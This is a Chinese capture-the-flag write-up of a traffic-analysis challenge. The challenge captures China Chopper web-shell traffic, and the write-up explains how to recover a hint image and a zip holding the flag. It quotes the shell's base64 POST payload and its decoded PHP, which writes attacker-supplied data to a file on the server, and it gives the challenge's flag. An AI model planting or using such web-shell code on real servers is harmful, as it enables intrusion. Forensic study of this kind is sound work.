202003_攻防世界_功夫再高也怕菜刀

Tags:流量分析,文件分离,WebShell

0x00. 题目

附件路径：https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称：202003_攻防世界_功夫再高也怕菜刀.zip

0x01. WP

1. 分析流量请求，找到一图片上传请求

![图片](https://img2024.cnblogs.com/blog/3693771/202509/3693771-20250920220808552-1143727563.png)
(base64_decode($_POST[action]));

&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==
Base64_decoded=>@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();

&z1=RDpcd2FtcDY0XHd3d1x1cGxvYWRcNjY2Ni5qcGc=
Base64_decoded=>D:\wamp64\www\upload\6666.jpg

&z2=FFD8FFE000104A46494600010101007800780000FFDB004300... ...

即将z2内容写入到文件z1中，复制十六进制字符串另存后得到hint信息

2. 导出下载的压缩包

继续查看流量，发现一包含flag.txt的压缩包数据

导出十六进制转存后得到压缩包文件，使用hint信息解压后获得flag

flag为flag{3OpWdJ-JP6FzK-koCMAK-VkfWBq-75Un2z}